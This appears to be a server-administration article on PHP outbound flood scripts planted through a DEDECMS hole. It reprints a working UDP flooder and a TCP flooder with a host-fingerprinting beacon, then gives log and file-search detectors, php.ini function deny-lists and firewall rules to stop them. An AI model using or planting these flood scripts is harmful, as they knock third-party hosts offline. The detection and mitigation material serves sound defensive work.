I. Analysis of PHP outbound packet flooding
PHP code opens sockets and uses the server's own network connection to attack other IP addresses. A common version of the script looks like this:
```php
<?php
$packets = 0;
// target address, port and duration are all taken straight from the query string
$ip = $_GET['ip'];
$rand = $_GET['port'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET['time'];
$time = time();
print "Flooded: $ip on port $rand\n";
$max_time = $time + $exec_time;
// build a 65535-byte payload of 'X'
$out = '';
for ($i = 0; $i < 65535; $i++) {
    $out .= "X";
}
// send UDP datagrams as fast as possible until the requested time has elapsed
while (1) {
    $packets++;
    if (time() > $max_time) {
        break;
    }
    $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
    if ($fp) {
        fwrite($fp, $out);
        fclose($fp);
    }
}
echo "Packet complete at " . date('H:i:s') . "\n"
   . "$packets (" . round(($packets * 65) / 1024, 2) . " mB) packets averaging "
   . round($packets / $exec_time, 2) . " packets/s\n";
?>
```
II. Symptoms
With IIS running, the server's outbound bandwidth is exhausted: the server is continuously sending packets to other hosts. This is the opposite of an inbound DDoS attack, where the server continuously receives a large number of packets.
This problem has recently appeared on a large number of servers because of the DEDECMS vulnerability.
How do you quickly find the affected sites?
Open today's log file under
`C:\Windows\System32\LogFiles\HTTPERR\httperr...log`;
it contains records like this:
06:37:28 58.20.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783 Disabled 30_FreeHost_1
The last three fields are `783 Disabled 30_FreeHost_1`:
`783` is the site ID in IIS;
`30_FreeHost_1` is the application pool.
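The log search described above, as an added example that is not part of the original article: it parses IIS HTTPERR records (field layout: date, time, c-ip, c-port, s-ip, s-port, cs-version, cs-method, cs-uri, sc-status, s-siteid, s-reason, s-queuename), flags requests whose query string carries a target plus `port` and `time` parameters as the flood scripts on this page expect, and reports the site ID and application pool. The log lines are constructed.

```python
# Added example (not from the original article): find IIS sites whose PHP
# flood script is being steered through the query string, using the HTTPERR log.
from urllib.parse import urlsplit, parse_qs

# Query-string parameters the UDP/TCP flood scripts read via $_GET.
TARGET_KEYS = {"ip", "host"}
REQUIRED_KEYS = {"port", "time"}

# Constructed sample log (the third record is benign and must not match).
SAMPLE_LOG = """\
#Software: Microsoft HTTP API 2.0
#Fields: date time c-ip c-port s-ip s-port cs-version cs-method cs-uri sc-status s-siteid s-reason s-queuename
2013-01-01 06:37:28 58.20.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /site/a.php?host=122.224.32.100&port=445&time=120 503 783 Disabled 30_FreeHost_1
2013-01-01 06:37:29 58.20.112.112 26818 98.126.247.13 80 HTTP/1.1 GET /shop/x.php?ip=203.0.113.9&port=53&time=300 503 791 Disabled 31_FreeHost_2
2013-01-01 06:38:01 198.51.100.7 40001 98.126.247.13 80 HTTP/1.1 GET /index.php?page=1&time=5 503 783 Disabled 30_FreeHost_1
"""

FIELDS = ["date", "time", "c_ip", "c_port", "s_ip", "s_port", "version",
          "method", "uri", "status", "siteid", "reason", "queue"]

def parse_line(line):
    """Split one HTTPERR record into named fields; None for comments or short lines."""
    if not line.strip() or line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) < len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))

def is_flood_control_request(uri):
    """True when the query names a target (ip/host) together with port and time."""
    keys = {k.lower() for k in parse_qs(urlsplit(uri).query)}
    return bool(keys & TARGET_KEYS) and REQUIRED_KEYS <= keys

def find_flood_sites(log_text):
    """Return (site id, app pool, script path, client ip) for each suspicious record."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_flood_control_request(rec["uri"]):
            hits.append((rec["siteid"], rec["queue"], urlsplit(rec["uri"]).path, rec["c_ip"]))
    return hits

if __name__ == "__main__":
    for siteid, pool, path, client in find_flood_sites(SAMPLE_LOG):
        print(f"site {siteid} pool {pool}: {path} driven from {client}")
```

Each hit names the site to stop and the pool to disable; the client IP tells you who is driving the script.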
III. Solutions
1. Locate the website and stop it, or stop its application pool, then restart IIS.
2. Block all outbound UDP in the IP security policy or in the firewall.
The latest version of the security package includes version 4.0 of the IP policy [download the security package]. After importing it you can restrict outbound UDP packets directly: download the package, then import the security policy. However, this policy does not close the DNS port, so some attacks still get through.
To address that, you can also adjust the IP policy so that UDP may only reach the IP address of one specific DNS server, such as 8.8.8.8. The attack then has no effect unless the hacker targets that very address. You can configure a DNS server IP that only you know in the NIC's DNS settings, not disclose it, and then restrict the UDP "open" rule in the IP policy to it. (Open the properties of the IP policy, double-click "open", delete either one of the two UDP records under "open"; double-click the remaining one and change the address from "Any IP address" to "A specific IP address", set to your own DNS server IP, for example 8.8.8.8. Save and click OK.)
We have also uploaded a new security package containing a file named "Xingwai ('out-of-the-star') VM management platform IP policy to disable all UDP ports.ipsec". Import and enable it to close all UDP ports and block such attacks completely. However, this policy also closes the DNS port: the server can no longer resolve domain names, so IE cannot open any domain and users' collection (content-fetching) function stops working. (Likewise, if this policy is applied on the master server, the controlled self-check fails because domain names cannot be resolved. Some users also report that it causes MySQL problems.)
3. Use the "First-class Information Monitoring" interception system: in both SQL interception and website interception, add the keyword `port=` (other keywords can be deleted).
4. You can also disable the functions the code above relies on directly: edit win\php.ini and restart IIS.

```ini
ignore_user_abort = On
```
(remove the leading `;` so this line is no longer commented out)

```ini
disable_functions = exec, system, passthru, popen, pclose, shell_exec, proc_open, curl_exec, multi_exec, dl, chmod, stream_socket_server, popepassthru, pfsockopen, gzinflate,
```
and append `fsockopen, set_time_limit` to that list.

However, this will cause many PHP programs to malfunction.
On the other hand, the situation also shows that the server itself is reasonably well secured: if hackers could break into the server, they would escalate privileges directly rather than bother with DoS.
A new PHP DoS script based on TCP connections has also appeared recently:

```php
<?php
set_time_limit(999999);
// target, port and duration again come from the query string
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$packets = 64;
ignore_user_abort(True);
if (StrLen($host) == 0 or StrLen($port) == 0 or StrLen($exec_time) == 0) {
    // fingerprint beacon: called with only a 'rat' marker, the script reports
    // host name, resolved address, OS and server software back to the caller
    if (StrLen($_GET['rat']) <> 0) {
        echo $_GET['rat'] . $_SERVER["HTTP_HOST"] . "|"
           . getHostByName($_SERVER['SERVER_NAME']) . "|"
           . php_uname() . "|" . $_SERVER['SERVER_SOFTWARE'] . $_GET['rat'];
        exit;
    }
    exit;
}
$max_time = time() + $exec_time;
// open TCP connections in a loop; note the hard-coded check that only lets the
// loop run when time=69 is supplied, a useful keyword when hunting in the logs
while (1) {
    $packets++;
    if (time() > $max_time or $exec_time != 69) {
        break;
    }
    $fp = fsockopen("tcp://$host", $port, $errno, $errstr, 0);
}
?>
```
Likewise, the following countermeasures apply:
1. Disable the functions in win\php.ini and restart IIS, exactly as in item 4 above (uncomment `ignore_user_abort = On` and add `fsockopen, set_time_limit` to `disable_functions`). As before, this will cause many PHP programs to malfunction.
2. Block all outbound TCP packets in the IP policy; however, this disables the collection function and cannot be used on the master server.
3. On the server, search all PHP files for the keywords `tcp:` or `udp:`, find the attack file, and delete it.
The above methods apply to both VPS and colocated server users.
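The file search in item 3, as an added example that is not part of the original article: it walks a web root and flags PHP files that open a raw `udp://` or `tcp://` socket, ranking those that also read the target from the request and loop forever (the signature shared by both scripts on this page) above legitimate socket users such as a mailer. The sample files are constructed and written to a temporary directory so the script runs offline.

```python
# Added example (not from the original article): locate PHP flood scripts by
# the socket / request-parameter / infinite-loop pattern shown above.
import os
import re
import tempfile

SOCKET_RE = re.compile(r'\bp?fsockopen\s*\(\s*["\'](udp|tcp)://', re.IGNORECASE)
GET_RE = re.compile(r'\$_(GET|POST|REQUEST)\s*\[', re.IGNORECASE)
LOOP_RE = re.compile(r'\bwhile\s*\(\s*(1|true)\s*\)', re.IGNORECASE)

def classify_php_source(src):
    """Return the list of indicators matched in one file's contents (empty = clean)."""
    indicators = []
    m = SOCKET_RE.search(src)
    if m:
        indicators.append(f"{m.group(1).lower()}-socket")
    if GET_RE.search(src):
        indicators.append("request-controlled")
    if LOOP_RE.search(src):
        indicators.append("infinite-loop")
    return indicators

def scan_web_root(root):
    """Return (path, indicators) for .php files opening a raw socket, riskiest first."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                inds = classify_php_source(fh.read())
            if any(i.endswith("-socket") for i in inds):
                hits.append((path, inds))
    return sorted(hits, key=lambda h: -len(h[1]))

# Constructed sample files: one flood script, one legitimate SMTP client, one plain page.
SAMPLES = {
    "flood.php": '<?php $ip=$_GET["ip"]; while(1){ $fp=fsockopen("udp://$ip",53,$e,$s,5);} ?>',
    "mailer.php": '<?php $fp = fsockopen("tcp://smtp.example.invalid", 25); fwrite($fp, "EHLO"); ?>',
    "index.php": '<?php echo "hello"; ?>',
}

def demo():
    with tempfile.TemporaryDirectory() as root:
        for name, body in SAMPLES.items():
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return [(os.path.basename(p), i) for p, i in scan_web_root(root)]

if __name__ == "__main__":
    for name, inds in demo():
        print(name, ", ".join(inds))
```

Review every reported file before deleting it; a file with only a `tcp-socket` indicator is often a legitimate mail or API client.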